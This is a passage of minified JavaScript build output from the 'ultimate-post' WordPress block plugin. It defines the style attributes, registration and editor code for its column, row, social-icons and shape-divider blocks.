"}]},colTypo:{type:"object",default:{openTypography:0,size:{lg:16,unit:"px"},height:{lg:"",unit:"px"},decoration:"none",family:"",weight:700},style:[{selector:"{{ULTP}}"}]},columnSticky:{type:"boolean",default:!1},columnStickyOffset:{type:"object",default:{lg:"0",ulg:"px"},style:[{depends:[{key:"columnSticky",condition:"==",value:!0}],selector:"{{ULTP}} { position: sticky; top: calc( 32px + {{columnStickyOffset}}); align-self: start; }"}]},advanceId:{type:"string",default:""},advanceZindex:{type:"string",default:"",style:[{selector:"{{ULTP}} {z-index:{{advanceZindex}};}"}]},columnOverflow:{type:"string",default:"visible",style:[{selector:".block-editor-block-list__block > {{ULTP}} > .ultp-column-wrapper, \n            .ultp-row-content > {{ULTP}} > .ultp-column-wrapper { overflow: {{columnOverflow}}; }"}]},columnEnableLink:{type:"boolean",default:!1},columnWrapperLink:{type:"string",default:"example.com",style:[{depends:[{key:"columnEnableLink",condition:"==",value:!0}]}]},columnTargetLink:{type:"boolean",default:!1,style:[{depends:[{key:"columnEnableLink",condition:"==",value:!0}]}]},hideExtraLarge:{type:"boolean",default:!1,style:[{selector:"{{ULTP}} {display:none;}"}]},hideTablet:{type:"boolean",default:!1,style:[{selector:"{{ULTP}} {display:none;}"}]},hideMobile:{type:"boolean",default:!1,style:[{selector:"{{ULTP}} {display:none;}"}]},advanceCss:{type:"string",default:"",style:[{selector:""}]}}},28578:(e,t,l)=>{"use strict";var o=l(67294),a=l(91202),i=l(70234),n=l(52);const{__}=wp.i18n,{registerBlockType:r}=wp.blocks;r("ultimate-post/column",{title:__("Column","ultimate-post"),parent:["ultimate-post/row"],icon:(0,o.createElement)("img",{className:"ultp-block-icon",src:ultp_data.url+"assets/img/blocks/column.svg"}),category:"ultimate-post",description:__("Add Column block for your layout.","ultimate-post"),keywords:[__("Column","ultimate-post"),__("Row","ultimate-post")],supports:{reusable:!1,html:!1},attributes:n.Z,example:{attributes:{previewImg:ultp_data.url+"assets/img/preview/wrapper.svg"}},edit:a.Z,save:i.Z})},3609:(e,t,l)=>{"use strict";var o=l(67294),a=l(83100),i=l(66187),n=l(64626),r=l(40358);const{__}=wp.i18n,{registerBlockType:s,createBlock:p}=wp.blocks,c=(0,a.Z)("https://wpxpo.com/docs/postx/postx-features/row-column/","block_docs");function u(e){return{type:"block",blocks:[e],transform:(t,l)=>p("ultimate-post/row",{layout:{lg:[100],sm:[100],xs:[100]},previewImg:ultp_data.url+"assets/img/preview/row.svg"},[p("ultimate-post/column",{},[p(e,{...t},l)])])}}s("ultimate-post/row",{title:__("Row","ultimate-post"),icon:(0,o.createElement)("img",{className:"ultp-block-icon",src:ultp_data.url+"assets/img/blocks/row.svg"}),category:"ultimate-post",description:(0,o.createElement)("span",{className:"ultp-block-info"},__("Add Row block for your layout.","ultimate-post"),(0,o.createElement)("a",{target:"_blank",href:c,rel:"noreferrer"},__("Documentation","ultimate-post"))),keywords:[__("row","ultimate-post"),__("wrap","ultimate-post"),__("column","ultimate-post")],supports:{align:["center","wide","full"],html:!1,reusable:!1},attributes:r.Z,example:{attributes:{previewImg:ultp_data.url+"assets/img/preview/row.svg"}},transforms:{from:[u("ultimate-post/post-grid-1"),u("ultimate-post/post-grid-2"),u("ultimate-post/post-grid-3"),u("ultimate-post/post-grid-4"),u("ultimate-post/post-grid-5"),u("ultimate-post/post-grid-6"),u("ultimate-post/post-grid-7"),u("ultimate-post/post-list-1"),u("ultimate-post/post-list-2"),u("ultimate-post/post-list-3"),u("ultimate-post/post-list-4"),u("ultimate-post/post-module-1"),u("ultimate-post/post-module-2"),u("ultimate-post/post-grid-parent"),u("ultimate-post/heading"),u("ultimate-post/social-icons"),u("ultimate-post/advanced-list"),u("ultimate-post/accordion"),u("ultimate-post/image"),u("ultimate-post/news-ticker"),u("ultimate-post/social-icons"),u("ultimate-post/ultp-taxonomy"),u("ultimate-post/menu"),u("ultimate-post/star-rating"),u("ultimate-post/tabs"),u("ultimate-post/youtube-gallery"),{type:"block",blocks:["core/columns"],transform:(e,t)=>p("ultimate-post/row",{layout:{lg:[100],sm:[100],xs:[100]},previewImg:ultp_data.url+"assets/img/preview/row.svg"},t.filter((e=>"core/column"===e.name)).map((e=>p("ultimate-post/column",{},e.innerBlocks))))},{type:"block",blocks:["core/group"],transform:(e,t)=>p("ultimate-post/row",{layout:{lg:[100],sm:[100],xs:[100]},previewImg:ultp_data.url+"assets/img/preview/row.svg"},[p("ultimate-post/column",{},t)])},{type:"block",blocks:["core/cover"],transform:(e,t)=>p("ultimate-post/row",{layout:{lg:[100],sm:[100],xs:[100]},previewImg:ultp_data.url+"assets/img/preview/row.svg"},[p("ultimate-post/column",{},t)])}]},edit:i.Z,save:n.Z})},20498:(e,t,l)=>{"use strict";l.d(t,{T:()=>i});var o=l(67294),a=l(60448);const i=(e,t,l,i)=>{const n={asymmetrical_triangle:(0,o.createElement)("g",null,(0,o.createElement)("polygon",{points:"1000,5 732.93,100 0,5 0,0 1000,0 \t"})),asymmetrical_triangle_invert:(0,o.createElement)("polygon",{points:"1000,0 1000,100 732.9,5 0,100 0,0 "}),curve:(0,o.createElement)("path",{d:"M1000,0L1000,0c0,1.3-1,2.5-2.7,3.2C854,61.3,683.2,100,500,100C316.8,100,146,61.3,2.7,3.2C1,2.5,0,1.3,0,0H1000z"}),curve_invert:(0,o.createElement)("g",null,(0,o.createElement)("path",{d:"M1000,100V0H0v100c0-1.3,1-2.5,2.7-3.2C146,38.7,316.8,3.3,500,3.3s354,35.4,497.3,93.6C999,97.5,1000,98.7,1000,100z"})),mountain:(0,o.createElement)("g",null,(0,o.createElement)("path",{style:{opacity:"0.34"},className:"st0",d:"M642.9,36.2c13-11.4,25.1-21.2,39.6-21c37.6,0.6,59.9,52.6,98.2,60.7c1.6,0.3,3.2,0.6,4.8,0.9C768.9,88,750,94.2,726.9,88.5C689.9,79.3,682.5,45.1,642.9,36.2z"}),(0,o.createElement)("path",{style:{opacity:"0.34"},className:"st0",d:"M415.5,29.7c26.1-12.2,54-14.2,86.7,9.8c17.6,13,33,21.2,46.5,25.8c-18.1,13.1-37.2,23.4-70,14.2C453.6,72.5,436.7,48.9,415.5,29.7z"}),(0,o.createElement)("path",{style:{opacity:"0.6"},className:"st1",d:"M548.8,65.3c17.9-12.9,34.9-28.6,63.2-30.8c12.3-0.9,22.4-0.2,31,1.7C620.1,56.2,594.6,81,548.8,65.3z"}),(0,o.createElement)("path",{style:{opacity:"0.6"},className:"st1",d:"M785.5,76.8c34.4-23.1,59.1-67.4,91.7-70.7c52.1-5.2,68,33.1,122.8,33.1v42.4c-43.9,0-56.9-54.7-98-54.4C870.1,28.1,859.2,89.7,785.5,76.8z"}),(0,o.createElement)("path",{style:{opacity:"0.6"},className:"st1",d:"M0,81.6V39.2c62.5,0,62.5-31.9,125-31.9S208.2,61,260,54.2c36-4.7,47.2-51.6,93.2-51.6c27.2,0,46.1,12.2,62.4,27c-63,29.3-115.8,117.1-202.6,38.6c-28.3-25.7-47.6-53.8-103.3-48.3C60.2,24.8,43.9,81.6,0,81.6z"}),(0,o.createElement)("path",{d:"M0,39.2V0.1h1000v39.1c-54.8,0-70.7-38.4-122.8-33.2c-32.6,3.3-57.3,47.6-91.7,70.7c-1.6-0.3-3.1-0.6-4.8-0.9c-38.3-8.1-60.6-60-98.2-60.7c-14.5-0.2-26.6,9.6-39.6,21c-8.6-2-18.7-2.7-31-1.7c-28.3,2.2-45.2,17.9-63.2,30.8c-13.6-4.6-28.9-12.8-46.5-25.8c-32.7-24.1-60.6-22-86.7-9.8c-16.3-14.8-35.2-27-62.4-27c-45.9,0-57.1,46.9-93.2,51.6c-51.7,6.8-72.5-46.9-135-46.9S62.5,39.2,0,39.2z"})),tilt:(0,o.createElement)("polygon",{points:"0,0 1000,0 1000,100 "}),waves:(0,o.createElement)("path",{d:"M1000,0v65.8c-15.6-11.2-31.2-22.4-62.5-22.4c-46.2,0-64.7,33.2-116.2,33.2c-92.3,0-118-65-225.2-65c-121.4,0-132.5,88.5-238.5,88.5c-70.3,0-89.6-51.8-167.4-51.8c-65.4,0-73.4,40-127.8,40C31.3,88.2,15.6,77,0,65.8V0H1000z"}),waves_invert:(0,o.createElement)("path",{d:"M1000,45.7V0H0v45.7c15.6-11.2,31.3-22.4,62.5-22.4c54.4,0,62.4,40,127.8,40c77.7,0,97.1-51.8,167.4-51.8c106,0,117,88.5,238.5,88.5c107.2,0,132.9-65,225.2-65c51.4,0,69.9,33.2,116.2,33.2C968.8,68.1,984.4,56.9,1000,45.7z"})};return(0,o.createElement)("svg",{viewBox:"0 0 1000 100",preserveAspectRatio:"none",fill:i?.openColor?"gradient"==i.type?`url(#${l}shape-${t})`:i.color:"#f5f5f5"},n[e],(0,o.createElement)("defs",null,i?.openColor&&"gradient"==i?.type&&(e=>{const i=(e=(e=")"==(e=(e=(0,a.MR)(e)?e:(0,a._n)("colorcode",e)).replace(/linear-gradient\(|\);/gi,"")).slice(-1)?e.substring(0,e.length-1):e).split("deg,"))[0];return e=(e=e[1].split(/(%,|%)/gi)).filter((function(e){return!["","%","%,"].includes(e)})),(0,o.createElement)("linearGradient",{id:`${l}shape-${t}`,gradientTransform:`rotate(${i})`},e.map(((e,t)=>{let l=e.replace(")",")|||");return l=l.split("|||"),(0,o.createElement)("stop",{key:t,offset:l[1]+"%",stopColor:l[0]})})))})(i.gradient)))}},60553:(e,t,l)=>{"use strict";l.d(t,{Z:()=>b});var o=l(67294),a=l(53049),i=l(99838),n=l(95667);const{__}=wp.i18n,{InspectorControls:r,InnerBlocks:s,useBlockProps:p}=wp.blockEditor,{useEffect:c,useState:u,useRef:d,Fragment:m}=wp.element,{getBlockAttributes:g,getBlockRootClientId:y}=wp.data.select("core/block-editor");function b(e){const t=d(null),[l,b]=u("Content"),{isSelected:v,setAttributes:h,name:f,attributes:k,className:w,clientId:x,attributes:{previewImg:T,enableIcon:_,enableText:C,blockId:E,advanceId:S,layout:P,iconSize2:L,iconBgSize2:I,iconSize:B,iconBgSize:U,currentPostId:M}}=e;c((()=>{const e=x.substr(0,6),t=g(y(x));(0,a.qi)(h,t,M,x),L.replace&&B&&h({iconSize2:{lg:B}}),I.replace&&U&&h({iconBgSize2:{lg:U}}),E?E&&E!=e&&(t?.hasOwnProperty("ref")||(0,a.k0)()||t?.hasOwnProperty("theme")||h({blockId:e})):h({blockId:e})}),[x]),c((()=>{const e=t.current;var l;e?((l=e).enableText!=C||l.enableIcon!=_)&&((0,a.Gu)(x),t.current=k):t.current=k}),[k]);const A={setAttributes:h,name:f,attributes:k,setSection:b,section:l,clientId:x};let H;if(E&&(H=(0,i.Kh)(k,"ultimate-post/social-icons",E,(0,a.k0)())),T&&!v)return(0,o.createElement)("img",{style:{marginTop:"0px",width:"420px"},src:T});c((()=>{v&&T&&h({previewImg:""})}),[e?.isSelected]);const N=p({...S&&{id:S},className:`ultp-block-${E} ${w}`});return(0,o.createElement)(m,null,(0,o.createElement)(r,null,(0,o.createElement)(n.Z,{store:A})),(0,o.createElement)("div",N,H&&(0,o.createElement)("style",{dangerouslySetInnerHTML:{__html:H}}),(0,o.createElement)("ul",{className:`ultp-social-icons-wrapper ultp-social-icons-${P}`},(0,o.createElement)(s,{template:[["ultimate-post/social",{socialText:"Facebook",customIcon:"facebook"}],["ultimate-post/social",{socialText:"WordPress",customIcon:"wordpress_solid"}],["ultimate-post/social",{socialText:"WhatsApp",customIcon:"whatsapp"}]],allowedBlocks:["ultimate-post/social"]}))))}},56098:(e,t,l)=>{"use strict";l.d(t,{Z:()=>n});var o=l(67294);const{InnerBlocks:a,useBlockProps:i}=wp.blockEditor;function n(e){const{blockId:t,advanceId:l,layout:n}=e.attributes,r=i.save({...l&&{id:l},className:`ultp-block-${t}`});return(0,o.createElement)("div",r,(0,o.createElement)("ul",{className:`ultp-social-icons-wrapper ultp-social-icons-${n}`},(0,o.createElement)(a.Content,null)))}},95667:(e,t,l)=>{"use strict";l.d(t,{Z:()=>n});var o=l(67294),a=l(53049),i=l(92637);const{__}=wp.i18n,n=({store:e})=>(0,o.createElement)(o.Fragment,null,(0,o.createElement)(i.Sections,null,(0,o.createElement)(i.Section,{slug:"global",title:__("Global Style","ultimate-post")},(0,o.createElement)(a.T,{title:"inline",include:[{position:1,data:{type:"layout",block:"social-icons",key:"layout",selector:"ultp-social-layout-setting",label:__("Layout","ultimate-post"),options:[{img:"assets/img/layouts/social_icons/icon1.png",label:"Layout 1",value:"layout1",pro:!1},{img:"assets/img/layouts/social_icons/icon2.png",label:"Layout 2",value:"layout2",pro:!1}]}},{position:2,data:{type:"toggle",key:"iconInline",label:__("Inline View","ultimate-post")}},{position:3,data:{type:"alignment",block:"social-icons",key:"iconAlignment",disableJustify:!0,label:__("Horizontal Alignment","ultimate-post")}},{position:4,data:{type:"range",key:"iconSpace",min:0,max:300,step:1,responsive:!0,label:__("Space Between Items","ultimate-post")}},{position:5,data:{type:"range",key:"iconTextSpace",min:0,max:300,step:1,responsive:!0,label:__("Spacing Between Icon & Texts","ultimate-post")}}],initialOpen:!0,store:e}),(0,o.createElement)(a.T,{title:__("Icon/Image","ultimate-post"),depend:"enableIcon",include:[{position:2,data:{type:"group",key:"iconPosition",justify:!0,label:__("Icon - Label Alignment","ultimate-post"),options:[{value:"initial",label:__("Top","ultimate-post")},{value:"center",label:__("Center","ultimate-post")},{value:"end",label:__("Bottom","ultimate-post")}]}},{position:5,data:{type:"dimension",key:"imgRadius",step:1,unit:!0,responsive:!0,label:__("Image Radius","ultimate-post")}},{position:7,data:{type:"range",key:"iconSize2",responsive:!0,label:__("Icon/Image Size","ultimate-post")}},{position:8,data:{type:"range",key:"iconBgSize2",responsive:!0,label:__("Background Size","ultimate-post"),help:"Icon Background Color Required"}},{position:9,data:{type:"separator",label:__("Icon Style","ultimate-post")}},{position:10,data:{type:"tab",content:[{name:"normal",title:__("Normal","ultimate-post"),options:[{type:"color",key:"iconColor",label:__("Icon Color","ultimate-post")},{type:"color",key:"iconBg",label:__("Icon  Background","ultimate-post")},{type:"border",key:"iconBorder",label:__("Border","ultimate-post")},{type:"dimension",key:"iconRadius",step:1,unit:!0,responsive:!0,label:__("Border Radius","ultimate-post")}]},{name:"hover",title:__("Hover","ultimate-post"),options:[{type:"color",key:"iconHvrColor",label:__("Icon Color","ultimate-post")},{type:"color",key:"iconHvrBg",label:__("Icon  Background","ultimate-post")},{type:"border",key:"iconHvrBorder",label:__("Border","ultimate-post")},{type:"dimension",key:"iconHvrRadius",step:1,unit:!0,responsive:!0,label:__("Border Radius","ultimate-post")}]}]}}],initialOpen:!1,store:e}),(0,o.createElement)(a.T,{title:__("Text","ultimate-post"),depend:"enableText",include:[{position:2,data:{type:"typography",key:"textTypo",label:__("Text Typography","ultimate-post")}},{position:3,data:{type:"color",key:"textColor",label:__("Text Color","ultimate-post")}},{position:4,data:{type:"color",key:"textHvrColor",label:__("Text Hover Color","ultimate-post")}}],initialOpen:!1,store:e}),(0,o.createElement)(a.T,{title:__("Content","ultimate-post"),include:[{position:1,data:{type:"dimension",key:"contentPadding",step:1,unit:!0,responsive:!0,label:__("Padding","ultimate-post")}},{position:2,data:{type:"toggle",key:"contentFullWidth",label:__("Full Width","ultimate-post")}},{position:3,data:{type:"tab",content:[{name:"normal",title:__("Normal","ultimate-post"),options:[{type:"color2",key:"contentBg",label:__("Background Color","ultimate-post")},{type:"border",key:"contentBorder",label:__("Border","ultimate-post")},{type:"dimension",key:"contentRadius",step:1,unit:!0,responsive:!0,label:__("Border Radius","ultimate-post")}]},{name:"hover",title:__("Hover","ultimate-post"),options:[{type:"color2",key:"contentHvrBg",label:__("Icon  Background","ultimate-post")},{type:"border",key:"contentHvrBorder",label:__("Border","ultimate-post")},{type:"dimension",key:"contentHvrRadius",step:1,unit:!0,responsive:!0,label:__("Border Radius","ultimate-post")}]}]}}],initialOpen:!1,store:e})),(0,o.createElement)(i.Section,{slug:"advanced",title:__("Advanced","ultimate-post")},(0,o.createElement)(a.yB,{initialOpen:!0,store:e}),(0,o.createElement)(a.Mg,{store:e}),(0,o.createElement)(a.iv,{store:e}))))},6864:(e,t,l)=>{"use strict";l.d(t,{Z:()=>o});const o={blockId:{type:"string",default:""},currentPostId:{type:"string",default:""},layout:{type:"string",default:"layout1",style:[{depends:[{key:"layout",condition:"==",value:"layout1"}]},{depends:[{key:"layout",condition:"==",value:"layout2"}]}]},iconInline:{type:"boolean",default:!0,style:[{depends:[{key:"iconInline",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-social-icons-wrapper .block-editor-inner-blocks .block-editor-block-list__layout, \n                {{ULTP}} .ultp-social-icons-wrapper:has( > .wp-block-ultimate-post-social) { display: flex;} \n                {{ULTP}} .ultp-social-icons-wrapper > li:last-child { padding-right: 0px; margin-right: 0px; } \n                {{ULTP}} .block-editor-block-list__layout > div, \n                {{ULTP}} .wp-block-ultimate-post-social { width: auto !important; }"},{depends:[{key:"iconInline",condition:"==",value:!1}],selector:"{{ULTP}} .ultp-social-icons-wrapper .block-editor-inner-blocks .block-editor-block-list__layout, \n                {{ULTP}} .ultp-social-icons-wrapper:has( > .wp-block-ultimate-post-social) { display: block;}  \n                {{ULTP}} .block-editor-block-list__layout > div, \n                {{ULTP}} .wp-block-ultimate-post-social { width: 100%; }"},{depends:[{key:"layout",condition:"==",value:"layout2"},{key:"enableSeparator",condition:"==",value:!0},{key:"iconInline",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-social-icons-wrapper .block-editor-inner-blocks .block-editor-block-list__layout, \n                {{ULTP}} .ultp-social-icons-wrapper:has( > .wp-block-ultimate-post-social) { display: flex;} \n                {{ULTP}} .block-editor-block-list__layout>div:last-child li{ padding-right: 0px; margin-right: 0px;}  \n                {{ULTP}} .block-editor-block-list__layout > div, \n                {{ULTP}} .wp-block-ultimate-post-social { width: auto !important; }"},{depends:[{key:"layout",condition:"==",value:"layout2"},{key:"enableSeparator",condition:"==",value:!0},{key:"iconInline",condition:"==",value:!1}],selector:"{{ULTP}} .ultp-social-icons-wrapper .block-editor-inner-blocks .block-editor-block-list__layout, \n                {{ULTP}} .ultp-social-icons-wrapper:has( > .wp-block-ultimate-post-social) { display: block; }  \n                {{ULTP}} .block-editor-block-list__layout > div, \n                {{ULTP}} .wp-block-ultimate-post-social{ width: 100%; }"}]},iconAlignment:{type:"string",default:"left",style:[{depends:[{key:"iconAlignment",condition:"==",value:"left"},{key:"iconInline",condition:"==",value:!1}],selector:"{{ULTP}} .ultp-social-icons-wrapper:has(> .wp-block-ultimate-post-social ), \n                {{ULTP}} .ultp-social-icons-wrapper > .block-editor-inner-blocks .block-editor-block-list__layout { margin-right:  auto; display: flex; flex-direction: column; align-items: flex-start;}"},{depends:[{key:"iconAlignment",condition:"==",value:"right"},{key:"iconInline",condition:"==",value:!1}],selector:"{{ULTP}} .ultp-social-icons-wrapper:has(> .wp-block-ultimate-post-social ), \n                {{ULTP}} .ultp-social-icons-wrapper > .block-editor-inner-blocks .block-editor-block-list__layout { margin-left: auto; display: flex; flex-direction: column; align-items: flex-end;}"},{depends:[{key:"iconInline",condition:"==",value:!1},{key:"iconAlignment",condition:"==",value:"center"}],selector:"{{ULTP}} .ultp-social-icons-wrapper:has(> .wp-block-ultimate-post-social ), \n                {{ULTP}} .ultp-social-icons-wrapper > .block-editor-inner-blocks .block-editor-block-list__layout { margin: auto auto; display: flex; flex-direction: column; align-items: center;}"},{depends:[{key:"iconInline",condition:"==",value:!0},{key:"iconAlignment",condition:"==",value:"center"}],selector:"{{ULTP}} .ultp-social-icons-wrapper:has(> .wp-block-ultimate-post-social ), \n                {{ULTP}} .ultp-social-icons-wrapper > .block-editor-inner-blocks .block-editor-block-list__layout { margin: auto auto; display: flex; flex-wrap: wrap; justify-content: center;} \n                {{ULTP}} .ultp-social-icons-wrapper .ultp-social-content { justify-content: center; }"},{depends:[{key:"iconAlignment",condition:"==",value:"left"},{key:"iconInline",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-social-icons-wrapper:has(> .wp-block-ultimate-post-social ), \n                {{ULTP}} .ultp-social-icons-wrapper > .block-editor-inner-blocks .block-editor-block-list__layout { margin-right:  auto; display: flex; justify-content: flex-start; flex-wrap: wrap;}"},{depends:[{key:"iconAlignment",condition:"==",value:"right"},{key:"iconInline",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-social-icons-wrapper:has(> .wp-block-ultimate-post-social ), \n                {{ULTP}} .ultp-social-icons-wrapper > .block-editor-inner-blocks .block-editor-block-list__layout { margin-left:  auto; display: flex; justify-content: flex-end; flex-wrap: wrap;}"}]},iconSpace:{type:"object",default:{lg:"17",unit:"px"},style:[{selector:"{{ULTP}} > .ultp-social-icons-wrapper > .block-editor-inner-blocks > .block-editor-block-list__layout, \n            {{ULTP}} .ultp-social-icons-wrapper:has( > .wp-block-ultimate-post-social) { gap: {{iconSpace}}; }"}]},iconTextSpace:{type:"object",default:{lg:"12",ulg:"px"},style:[{selector:"{{ULTP}} .wp-block-ultimate-post-social .ultp-social-content { gap:{{iconTextSpace}}; }"}]},enableIcon:{type:"boolean",default:!0},iconPosition:{type:"string",default:"center",style:[{depends:[{key:"enableIcon",condition:"==",value:!0}],selector:"{{ULTP}} .wp-block-ultimate-post-social .ultp-social-content { align-items:{{iconPosition}}; }"}]},imgRadius:{type:"object",default:{lg:"",unit:"px"},style:[{depends:[{key:"socialIconsType",condition:"==",value:"image"}],selector:"{{ULTP}} .wp-block-ultimate-post-social img { border-radius: {{imgRadius}}; }"}]},iconSize:{type:"string"},iconBgSize:{type:"string"},iconSize2:{type:"object",default:{lg:18,replace:1},style:[{selector:"{{ULTP}} .wp-block-ultimate-post-social .ultp-social-bg svg, \n            {{ULTP}} .wp-block-ultimate-post-social .ultp-social-bg img { height:{{iconSize2}}px; width:{{iconSize2}}px; }"}]},iconBgSize2:{type:"object",default:{lg:"",replace:1},style:[{selector:"{{ULTP}} .wp-block-ultimate-post-social .ultp-social-bg { height:{{iconBgSize2}}px; width:{{iconBgSize2}}px; }"}]},iconColor:{type:"string",default:"var(--postx_preset_Contrast_1_color)",style:[{selector:"{{ULTP}} .wp-block-ultimate-post-social .ultp-social-bg svg { color: {{iconColor}}; }"}]},iconBg:{type:"string",default:"",style:[{selector:"{{ULTP}} .wp-block-ultimate-post-social .ultp-social-bg { background-color: {{iconBg}}; }"}]},iconBorder:{type:"object",default:{openBorder:0,width:{top:2,right:2,bottom:2,left:2},color:"#dfdfdf"},style:[{selector:"{{ULTP}} .wp-block-ultimate-post-social .ultp-social-bg"}]},iconRadius:{type:"object",default:{lg:{top:2,right:2,bottom:2,left:2,unit:"px"},unit:"px"},style:[{selector:"{{ULTP}} .wp-block-ultimate-post-social .ultp-social-bg { border-radius: {{iconRadius}}; }"}]},iconHvrColor:{type:"string",default:"var(--postx_preset_Primary_color)",style:[{selector:"{{ULTP}} .wp-block-ultimate-post-social .ultp-social-bg:hover svg { color: {{iconHvrColor}}; }"}]},iconHvrBg:{type:"string",default:"",style:[{selector:"{{ULTP}} .wp-block-ultimate-post-social .ultp-social-bg:hover { background-color: {{iconHvrBg}}; }"}]},iconHvrBorder:{type:"object",default:{openBorder:0,width:{top:2,right:2,bottom:2,left:2},color:"#dfdfdf"},style:[{selector:"{{ULTP}} .wp-block-ultimate-post-social .ultp-social-bg:hover"}]},iconHvrRadius:{type:"object",default:{lg:"",unit:"px"},style:[{selector:"{{ULTP}} .wp-block-ultimate-post-social .ultp-social-bg:hover { border-radius: {{iconHvrRadius}}; }"}]},enableText:{type:"boolean",default:!0,style:[{depends:[{key:"enableText",condition:"==",value:!0}]},{depends:[{key:"enableText",condition:"==",value:!1}],selector:"{{ULTP}} .ultp-social-content { display: block !important; }"}]},textTypo:{type:"object",default:{openTypography:1,size:{lg:16,unit:"px"},height:{lg:"24",unit:"px"},decoration:"none",family:"",weight:400},style:[{selector:"{{ULTP}}  .ultp-social-title, {{ULTP}}  .ultp-social-title a"}]},textColor:{type:"string",default:"var(--postx_preset_Contrast_1_color)",style:[{selector:"{{ULTP}} .ultp-social-title, {{ULTP}} .ultp-social-title a { color: {{textColor}}; }"}]},textHvrColor:{type:"string",default:"var(--postx_preset_Primary_color)",style:[{selector:"{{ULTP}} .ultp-social-icons-wrapper  > .wp-block-ultimate-post-social:hover .ultp-social-title, \n            {{ULTP}} .ultp-social-icons-wrapper  > .wp-block-ultimate-post-social:hover .ultp-social-title a, \n            {{ULTP}} .block-editor-block-list__block:hover > .wp-block-ultimate-post-social .ultp-social-title, \n            {{ULTP}} .block-editor-block-list__block:hover > .wp-block-ultimate-post-social .ultp-social-title a { color: {{textHvrColor}}; }"}]},contentPadding:{type:"object",default:{lg:{top:"2",bottom:"2",left:"6",right:"6",unit:"px"}},style:[{selector:"{{ULTP}} .wp-block-ultimate-post-social  .ultp-social-content { padding: {{contentPadding}}; }"}]},contentBg:{type:"object",default:{openColor:0,type:"color",color:"var(--postx_preset_Base_2_color)",size:"cover",repeat:"no-repeat"},style:[{selector:"{{ULTP}} .wp-block-ultimate-post-social .ultp-social-content"}]},contentBorder:{type:"object",default:{openBorder:0,width:{top:2,right:2,bottom:2,left:2},color:"var(--postx_preset_Contrast_2_color)"},style:[{selector:"{{ULTP}} .wp-block-ultimate-post-social .ultp-social-content"}]},contentRadius:{type:"object",default:{lg:"",unit:"px"},style:[{selector:"{{ULTP}} .wp-block-ultimate-post-social .ultp-social-content {border-radius: {{contentRadius}}}"}]},contentHvrBg:{type:"object",default:{openColor:0,type:"color",color:"#f5f5f5",size:"cover",repeat:"no-repeat"},style:[{selector:"{{ULTP}} .wp-block-ultimate-post-social .ultp-social-content:hover"}]},contentHvrBorder:{type:"object",default:{openBorder:0,width:{top:2,right:2,bottom:2,left:2},color:"#dfdfdf"},style:[{selector:"{{ULTP}} .wp-block-ultimate-post-social .ultp-social-content:hover"}]},contentHvrRadius:{type:"object",default:{lg:{top:2,right:2,bottom:2,left:2,unit:"px"},unit:"px"},style:[{selector:"{{ULTP}} .wp-block-ultimate-post-social .ultp-social-content:hover { border-radius: {{contentHvrRadius}}; }"}]},contentFullWidth:{type:"boolean",default:!1,style:[{depends:[{key:"iconInline",condition:"==",value:!1}],selector:"{{ULTP}} .ultp-social-icons-wrapper .block-editor-inner-blocks > .block-editor-block-list__layout, \n                {{ULTP}}.wp-block-ultimate-post-social-icons .ultp-social-icons-wrapper { width: 100%; max-width: 100%; }"}]},wrapBg:{type:"object",default:{openColor:0,type:"color",color:"#f5f5f5"},style:[{selector:"{{ULTP}} .ultp-social-icons-wrapper:has(> .wp-block-ultimate-post-social), \n            {{ULTP}} .ultp-social-icons-wrapper > .block-editor-inner-blocks .block-editor-block-list__layout"}]},wrapBorder:{type:"object",default:{openBorder:0,width:{top:1,right:1,bottom:1,left:1},color:"#009fd4",type:"solid"},style:[{selector:"{{ULTP}} .ultp-social-icons-wrapper:has(> .wp-block-ultimate-post-social), \n            {{ULTP}} .ultp-social-icons-wrapper > .block-editor-inner-blocks .block-editor-block-list__layout"}]},wrapShadow:{type:"object",default:{openShadow:0,width:{top:1,right:1,bottom:1,left:1},color:"#009fd4"},style:[{selector:"{{ULTP}} .ultp-social-icons-wrapper:has(> .wp-block-ultimate-post-social), \n            {{ULTP}} .ultp-social-icons-wrapper > .block-editor-inner-blocks .block-editor-block-list__layout"}]},wrapRadius:{type:"object",default:{lg:"",unit:"px"},style:[{selector:"{{ULTP}} .ultp-social-icons-wrapper:has(> .wp-block-ultimate-post-social), \n            {{ULTP}} .ultp-social-icons-wrapper > .block-editor-inner-blocks .block-editor-block-list__layout { border-radius:{{wrapRadius}}; }"}]},wrapHoverBackground:{type:"object",default:{openColor:0,type:"color",color:"#037fff"},style:[{selector:"{{ULTP}} .ultp-social-icons-wrapper:has(> .wp-block-ultimate-post-social):hover, \n            {{ULTP}} .ultp-social-icons-wrapper > .block-editor-inner-blocks .block-editor-block-list__layout:hover"}]},wrapHoverBorder:{type:"object",default:{openBorder:0,width:{top:1,right:1,bottom:1,left:1},color:"#009fd4",type:"solid"},style:[{selector:"{{ULTP}} .ultp-social-icons-wrapper:has(> .wp-block-ultimate-post-social):hover, \n            {{ULTP}} .ultp-social-icons-wrapper > .block-editor-inner-blocks .block-editor-block-list__layout:hover"}]},wrapHoverRadius:{type:"object",default:{lg:"",unit:"px"},style:[{selector:"{{ULTP}} .ultp-social-icons-wrapper:has(> .wp-block-ultimate-post-social):hover, \n            {{ULTP}} .ultp-social-icons-wrapper > .block-editor-inner-blocks .block-editor-block-list__layout:hover { border-radius:{{wrapHoverRadius}}; }"}]},wrapHoverShadow:{type:"object",default:{openShadow:0,width:{top:1,right:1,bottom:1,left:1},color:"#009fd4"},style:[{selector:"{{ULTP}} .ultp-social-icons-wrapper:has(> .wp-block-ultimate-post-social):hover, \n            {{ULTP}} .ultp-social-icons-wrapper > .block-editor-inner-blocks .block-editor-block-list__layout:hover"}]},wrapMargin:{type:"object",default:{lg:{top:"",bottom:"",unit:"px"}},style:[{selector:"{{ULTP}} .ultp-social-icons-wrapper:has(> .wp-block-ultimate-post-social), \n            {{ULTP}} .ultp-social-icons-wrapper > .block-editor-inner-blocks .block-editor-block-list__layout { margin:{{wrapMargin}}; }"}]},wrapOuterPadding:{type:"object",default:{lg:{top:"",bottom:"",left:"",right:"",unit:"px"}},style:[{selector:"{{ULTP}} .ultp-social-icons-wrapper:has(> .wp-block-ultimate-post-social), \n            {{ULTP}} .ultp-social-icons-wrapper > .block-editor-inner-blocks .block-editor-block-list__layout { padding:{{wrapOuterPadding}}; }"}]},advanceId:{type:"string",default:""},advanceZindex:{type:"string",default:"",style:[{selector:"{{ULTP}} .ultp-social-icons-wrapper 